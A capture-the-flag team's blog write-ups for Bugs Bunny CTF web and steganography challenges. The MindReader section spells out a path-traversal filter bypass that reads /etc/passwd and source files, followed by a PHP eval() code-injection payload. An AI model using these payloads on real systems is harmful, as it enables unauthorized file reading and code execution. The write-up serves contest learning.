Bugs Bunny CTF Writeups

Here are some of the Writeup for Bugs Bunny Capture The Flag challenges. As most of the services are down, I would be adding Write-ups one after the another for the services which are up currently. We participate as dcua team, group of awesome people trying the best effort for the challenges.

Web 350

Solver(s) : Aaditya Purani

There was one link given in the question

http://www.chouaibhm.me/

Opening the website, It is just a one-page site. We cannot really do much here. Viewing the source-code reveals a fake flag

<!– Bugs_Bunny{dont_be_stupid}—>

Now, Intuitively I started to search for special directories (apart from js, css, img etc) and files. I noticed that returned 200 Status whereas rest all displayed ‘NoSuchKey’

http://www.chouaibhm.me/META-INF/
http://www.chouaibhm.me/WEB-INF/

Directory listing was not there. But it is was trivial by then to view this as an s3 bucket. Hence, I fired up my terminal and used aws-cli

$ aws s3 ls s3://www.chouaibhm.me/

[res]
 PRE QnVnc19CdW5ueXtZMHVfNHJlX0MwMDFfdDBkYXlfRHVkM30/
 PRE css/
 PRE img/
 PRE js/
 PRE sass/
 PRE vendor/
2017-07-20 03:04:47 52157 index.html

Nice, we can read the s3 bucket. Using the similar command to go inside the first directory we see there exist a flag.txt

$ curl http://www.chouaibhm.me/QnVnc19CdW5ueXtZMHVfNHJlX0MwMDFfdDBkYXlfRHVkM30/flag.txt
you are so close don't be stupid tho xD

Bugs_Bunny{I_am_JOking_lol}

That is also not the flag. But as we can notice the directory is base64.

$ echo -e "QnVnc19CdW5ueXtZMHVfNHJlX0MwMDFfdDBkYXlfRHVkM30=" | base64 -d

Bugs_Bunny{Y0u_4re_C001_t0day_Dud3}

That’s it. Pretty simple

Web 150 (MindReader)

Solver(s) : Aaditya Purani & solarwind

URL: http://52.53.151.123/web/web100/

Note that, We were the 2nd team to solve this challenge after it was launched (~30 minutes). When we solved, It was running on the above mentioned URL. Hence, our write-up would specifically show how we solved for that URL.

Visiting the domain gives us as below:

We can see that there is a placeholder which says file/readme.txt .So, we think evil here and start by inputting /etc/passwd . Gives us custom error as a troll. So, It’s not that easy. Hence, we input file/readme.txt and we can see it does read the file. Cool !

I tried using php:// wrapper like PHP://filter/convert.base64-encode/resource= . Such techniques are mentioned here. It works, but for file/readme.txt specifically. Our goal is to read break out of it. I noticed that, anything except file/readme.txt threw custom error. Time to fiddle !

This is basically how traversal works

$ ls dir1/                   #dir1 contains file1.txt
file1.txt

$ cat dir1/file1.txt         #concat file1.txt to stdout

$ cat dir1/../dir1/file.txt  #works same as above

So what do you notice ? It’s not confusing at all. Here is breaking

$ cat dir1/../dir1/file.txt
       
        ^      ^
        |      |
        ________
        Same dir
/../ moves one directory back , so you reach where you were before

Now that you know the basics you can fetch like

http://52.53.151.123/web/web100/readMinder.php?file=file/../file/readme.txt

This works. Hence, Traversal is possible between directories. But there is a filter as already mentioned otherwise I could have traversed till /etc/passwd before. So, let’s defeat it.

http://52.53.151.123/web/web100/readMinder.php?file=file/../file/readme.txt.blah        (Blank Page)
http://52.53.151.123/web/web100/readMinder.php?file=file/../file/roastme.txt            (Custom Error)
http://52.53.151.123/web/web100/readMinder.php?file=file/../file/readme.omg             (Blank Page)

anything with readme worked. In order to traverse your end path should be the file you want to read. In my case, I don’t want to read junk like readme.* but particularly interested in juicy files. How about adding readme at the beginning :p

http://52.53.151.123/web/web100/readMinder.php?file=readme/../file/readme.txt

Throws Custom Error. Nice, they hate readme as pre-fix. I padded the pre-fix with xxx and suffix my working payload was

http://52.53.151.123/web/web100/readMinder.php?file=xxxreadmex/../file/readme.txt

Yikes. Broke out of the filter, within no time. I could access /etc/passwd

http://52.53.151.123/web/web100/readMinder.php?file=xxxreadmex/../../../../../../etc/passwd

Now, we can also read the source of readMinder.php , thanks to solarwind.

http://52.53.151.123/web/web100/readMinder.php?file=xxxreadmex/../readMinder.php
http://52.53.151.123/web/web100/readMinder.php?file=xxxreadmex/../flag/flag.txt

flag.txt was a troll too. I started reading Source to esclate this

56) exit("file name too long dude :v !"); $filename = basename($file); if (!strpos($file, "readme")) exit("Not The good Way bro 😉 !"); echo "
"; readfile($file); echo "
"; eval("fwrite(fopen('flag/flag.txt','a'),'$filename');"); ?> 

Spot the Bug. ! We can control the $file, hence $filename too. basename() function returns the filename from a path. That $filename goes to eval(). If you are a security guy, you won’t need introduction for the eval(). So, In this case we control what’s going into eval. and we can break out of it

eval("fwrite(fopen('flag/flag.txt','a'),'');echo('aaditya');"); ?> 

Payload: ‘);echo(‘aaditya

Now, we own the plot from here. Below, is the vector by solarwind using glob() to find files

http://52.53.151.123/web/web100/readMinder.php?file=xreadme.txt');var_dump(glob('*'));die('END

and

view-source: http://52.53.151.123/web/web100/key/key.txt
Bugs_bunny{R3adf1le_15_n0t_G00d}

 

Steg100

We were given an Image, I tried to refine the image via GIMP editor. Here are the resultsWe can notice the flag now (It’s not much sharp in the image) : BUGS_BUNNY{Odd_2nd_3V3N_2r3nt_funNy}

Web 30

URL: http://52.53.151.123/web/web30.php

Visiting the page shows that your User-Agent is not Bugs_Bunny Browser. We can tamper with User-Agent by using ‘User-Agent Switcher’ plugin and creating an agent with Bugs_Bunny Browser.

After refreshing, we reach the next page which says (1/2) This is your key maybe you need twice “Hashkiller” . We can open Burp-Suite and start Intercepting the request. There is a

Cookie: flag=zn8XhqnlBRBetevoFcSQAw0OMVH6Kwj23svbneF1+5gDfBdn9osZBfB06c
Tub4ARg3OTTjsBIG7x

It’s a custom encryption. As the Hint suggests Hashkiller, we proceed to https://hashkiller.co.uk/text-encryption.aspx

and decrypt the cipher-text with key ‘Hashkiller’ and we get the flag

Bugs_Bunny{hashkiller_has_a_custom_encryption_ algorithm}

Conclusion:

We finished 1st at the end of the competition. Credits and Shouts to the Team.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s